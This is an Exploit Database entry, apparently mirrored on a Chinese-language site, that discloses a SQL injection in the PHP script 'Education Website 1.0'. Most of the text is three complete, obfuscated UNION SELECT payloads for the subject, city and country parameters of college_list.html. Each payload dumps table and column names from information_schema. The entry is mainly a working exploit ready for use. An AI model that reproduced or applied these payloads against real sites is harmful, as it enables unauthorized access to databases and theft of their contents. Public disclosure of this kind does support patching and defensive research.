Education Website 1.0 – ‘subject’ SQL Injection

• Exploit Database
• 53 阅读

• 作者： Ihsan Sencan
  日期： 2018-10-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45510/

• # Exploit Title: Education Website 1.0 - 'subject' SQL Injection
  # Dork: N/A
  # Date: 2018-10-01
  # Exploit Author: Ihsan Sencan
  # Vendor Homepage: http://scriptzee.com/
  # Software Link: http://scriptzee.com/products/details/34
  # Version: 1.0
  # Category: Webapps
  # Tested on: WiN7_x64/KaLiLinuX_x64
  # CVE: N/A
  
  # POC: 
  # http://localhost/[PATH]/college_list.html?subject=[SQL]
  
  -7'+/*!11111UNION*/(/*!11111SELECT*/0x283129%2c0x283229%2c0x283329%2c0x283429%2c0x283529%2c0x283629%2c(Select+export_set(5,@:=0,(select+count(*)/*!11111from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))%2c0x283829%2c0x283929%2c0x28313029%2c0x28313129%2c0x28313229%2c0x28313329%2c0x28313429%2c0x28313529%2c0x28313629%2c0x28313729%2c0x28313829%2c0x28313929%2c0x28323029%2c0x28323129%2c0x28323229%2c0x28323329%2c0x28323429%2c0x28323529%2c0x28323629%2c0x28323729%2c0x28323829%2c0x28323929%2c0x28333029%2c0x28333129%2c0x28333229%2c0x28333329%2c0x28333429%2c0x28333529%2c0x28333629%2c0x28333729%2c0x28333829%2c0x28333929%2c0x28343029%2c0x28343129%2c0x28343229%2c0x28343329%2c0x28343429%2c0x28343529%2c0x28343629%2c0x28343729%2c0x28343829%2c0x28343929%2c0x28353029)--+-
   
  # http://localhost/[PATH]/college_list.html?city=[SQL]
   
  '+/*!44444UNION*/(/*!44444SELECT*/0x283129%2c0x283229%2c0x283329%2c0x283429%2c0x283529%2c0x283629%2c(Select+export_set(5,@:=0,(select+count(*)/*!44444from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))%2c0x283829%2c0x283929%2c0x28313029%2c0x28313129%2c0x28313229%2c0x28313329%2c0x28313429%2c0x28313529%2c0x28313629%2c0x28313729%2c0x28313829%2c0x28313929%2c0x28323029%2c0x28323129%2c0x28323229%2c0x28323329%2c0x28323429%2c0x28323529%2c0x28323629%2c0x28323729%2c0x28323829%2c0x28323929%2c0x28333029%2c0x28333129%2c0x28333229%2c0x28333329%2c0x28333429%2c0x28333529%2c0x28333629%2c0x28333729%2c0x28333829%2c0x28333929%2c0x28343029%2c0x28343129%2c0x28343229%2c0x28343329%2c0x28343429%2c0x28343529%2c0x28343629%2c0x28343729%2c0x28343829%2c0x28343929%2c0x28353029)--+-
   
  # http://localhost/[PATH]/college_list.html?country=[SQL]
   
  '+/*!22222UNION*/(/*!22222SELECT*/0x283129%2c0x283229%2c0x283329%2c0x283429%2c0x283529%2c0x283629%2c(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))%2c0x283829%2c0x283929%2c0x28313029%2c0x28313129%2c0x28313229%2c0x28313329%2c0x28313429%2c0x28313529%2c0x28313629%2c0x28313729%2c0x28313829%2c0x28313929%2c0x28323029%2c0x28323129%2c0x28323229%2c0x28323329%2c0x28323429%2c0x28323529%2c0x28323629%2c0x28323729%2c0x28323829%2c0x28323929%2c0x28333029%2c0x28333129%2c0x28333229%2c0x28333329%2c0x28333429%2c0x28333529%2c0x28333629%2c0x28333729%2c0x28333829%2c0x28333929%2c0x28343029%2c0x28343129%2c0x28343229%2c0x28343329%2c0x28343429%2c0x28343529%2c0x28343629%2c0x28343729%2c0x28343829%2c0x28343929%2c0x28353029)--+-